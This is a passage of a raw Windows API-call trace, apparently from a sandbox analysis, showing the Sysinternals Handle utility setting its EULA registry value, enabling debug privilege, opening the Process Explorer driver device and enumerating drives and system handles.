¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0288.107] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0288.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0288.107] GetLastError () returned 0x0 [0288.107] SetLastError (dwErrCode=0x0) [0288.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0288.107] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0288.107] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0288.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0288.107] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0288.107] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0288.107] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsWow64Process") returned 0x7ffaf70ee960 [0288.107] GetCurrentProcess () returned 0xffffffffffffffff [0288.107] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x14fef0 | out: Wow64Process=0x14fef0) returned 1 [0288.108] GetLastError () returned 0x0 [0288.108] SetLastError (dwErrCode=0x0) [0288.108] GetLastError () returned 0x0 [0288.108] SetLastError (dwErrCode=0x0) [0288.108] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0288.108] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0288.108] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x0, lpcbData=0x14fc48*=0x4) returned 0x2 [0288.108] RegCloseKey (hKey=0x14c) returned 0x0 [0288.108] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0288.108] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x1, lpcbData=0x14fc48*=0x4) returned 0x0 [0288.108] RegCloseKey (hKey=0x14c) returned 0x0 [0288.108] GetLastError () returned 0x0 [0288.108] SetLastError (dwErrCode=0x0) [0288.108] GetLastError () returned 0x0 [0288.108] SetLastError (dwErrCode=0x0) [0288.108] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x14fc38 | out: phkResult=0x14fc38*=0x14c) returned 0x0 [0288.108] RegSetValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x14fc30*=0x1, cbData=0x4 | out: lpData=0x14fc30*=0x1) returned 0x0 [0288.109] RegCloseKey (hKey=0x14c) returned 0x0 [0288.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x0) returned 1 [0288.109] GetCurrentProcess () returned 0xffffffffffffffff [0288.109] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x14e3e0 | out: TokenHandle=0x14e3e0*=0x14c) returned 1 [0288.109] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14e3e8 | out: lpLuid=0x14e3e8*(LowPart=0x14, HighPart=0)) returned 1 [0288.113] AdjustTokenPrivileges (in: TokenHandle=0x14c, DisableAllPrivileges=0, NewState=0x14e3f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0288.113] GetLastError () returned 0x0 [0288.113] CloseHandle (hObject=0x14c) returned 1 [0288.113] GetLastError () returned 0x0 [0288.113] SetLastError (dwErrCode=0x0) [0288.113] GetLastError () returned 0x0 [0288.113] SetLastError (dwErrCode=0x0) [0288.113] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "\\device\\procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0288.113] SeCaptureSubjectContext (in: SubjectContext=0xffffd000ac0cf328 | out: SubjectContext=0xffffd000ac0cf328) [0288.114] ExGetPreviousMode () returned 0x1 [0288.114] SePrivilegeCheck (in: RequiredPrivileges=0xffffd000ac0cf348, SubjectSecurityContext=0xffffd000ac0cf328, AccessMode=0x1 | out: RequiredPrivileges=0xffffd000ac0cf348) returned 1 [0288.114] SeReleaseSubjectContext (in: SubjectContext=0xffffd000ac0cf328 | out: SubjectContext=0xffffd000ac0cf328) [0288.114] IoCompleteRequest () returned 0x884 [0288.114] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.114] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryInformationProcess") returned 0x7ffaf7aa36d0 [0288.114] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.114] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryInformationThread") returned 0x7ffaf7aa3790 [0288.114] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.114] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQuerySystemInformation") returned 0x7ffaf7aa38a0 [0288.114] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.114] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQuerySymbolicLinkObject") returned 0x7ffaf7aa4980 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryDirectoryObject") returned 0x7ffaf7aa47f0 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtOpenSymbolicLinkObject") returned 0x7ffaf7aa46c0 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtOpenDirectoryObject") returned 0x7ffaf7aa3ac0 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQueryObject") returned 0x7ffaf7aa3640 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="NtQuerySection") returned 0x7ffaf7aa3a50 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlInitAnsiString") returned 0x7ffaf7a75d30 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlInitUnicodeString") returned 0x7ffaf7a2f0d0 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlAnsiStringToUnicodeString") returned 0x7ffaf7a336a0 [0288.115] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.115] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlFreeUnicodeString") returned 0x7ffaf7a37110 [0288.116] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.116] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlFreeAnsiString") returned 0x7ffaf7a37110 [0288.116] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x7ffaf7a10000 [0288.116] GetProcAddress (hModule=0x7ffaf7a10000, lpProcName="RtlUnicodeStringToAnsiString") returned 0x7ffaf7a33dc0 [0288.116] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x0, Length=0x0, ResultLength=0x0 | out: SystemInformation=0x0, ResultLength=0x0) returned 0xc0000004 [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] GetLastError () returned 0x0 [0288.116] SetLastError (dwErrCode=0x0) [0288.116] RtlInitUnicodeString (in: DestinationString=0x14dac0, SourceString="\\DosDevices\\C:" | out: DestinationString="\\DosDevices\\C:") [0288.116] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x14db00, DesiredAccess=0x20001, ObjectAttributes=0x14db10 | out: SymbolicLinkHandle=0x14db00*=0x184) returned 0x0 [0288.116] NtQuerySymbolicLinkObject (in: SymLinkObjHandle=0x184, LinkTarget=0x14dbe0, DataWritten=0x14db08 | out: LinkTarget="\\Device\\HarddiskVolume1", DataWritten=0x14db08) returned 0x0 [0288.116] CloseHandle (hObject=0x184) returned 1 [0288.117] RtlInitUnicodeString (in: DestinationString=0x14dac0, SourceString="\\Device\\HarddiskVolume1" | out: DestinationString="\\Device\\HarddiskVolume1") [0288.117] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x14db00, DesiredAccess=0x20001, ObjectAttributes=0x14db10 | out: SymbolicLinkHandle=0x14db00*=0x0) returned 0xc0000024 [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetLastError () returned 0x0 [0288.117] SetLastError (dwErrCode=0x0) [0288.117] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetLastError () returned 0x0 [0288.118] SetLastError (dwErrCode=0x0) [0288.118] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0288.119] GetLastError () returned 0x0 [0288.119] SetLastError (dwErrCode=0x0) [0288.119] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetLastError () returned 0x0 [0288.120] SetLastError (dwErrCode=0x0) [0288.120] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0288.120] GetLastError () returned 0x0 [0288.121] SetLastError (dwErrCode=0x0) [0288.121] GetLastError () returned 0x0 [0288.121] SetLastError (dwErrCode=0x0) [0288.121] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0288.450] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x268310, Length=0x4000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0xaf498) returned 0xc0000004 [0288.451] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x268310, Length=0x8000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0xaf498) returned 0xc0000004 [0288.452] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x268310, Length=0x10000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0xaf498) returned 0xc0000004 [0288.453] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x268310, Length=0x20000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0xaf498) returned 0xc0000004 [0288.456] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x268310, Length=0x40000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0xaf498) returned 0xc0000004 [0288.461] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x268310, Length=0x80000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0xaf498) returned 0xc0000004 [0288.470] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1bd8040, Length=0x100000, ResultLength=0x14e420 | out: SystemInformation=0x1bd8040, ResultLength=0x14e420*=0xaf498) returned 0x0 [0288.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x268310, Length=0x4000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0x16fe8) returned 0xc0000004 [0288.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x268310, Length=0x8000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0x16fe8) returned 0xc0000004 [0288.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x268310, Length=0xc000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0x16fe8) returned 0xc0000004 [0288.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x268310, Length=0x10000, ResultLength=0x14e420 | out: SystemInformation=0x268310, ResultLength=0x14e420*=0x16fe8) returned 0xc0000004 [0288.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x268310, Length=0x14000, ResultLength=0x14e420 | out: 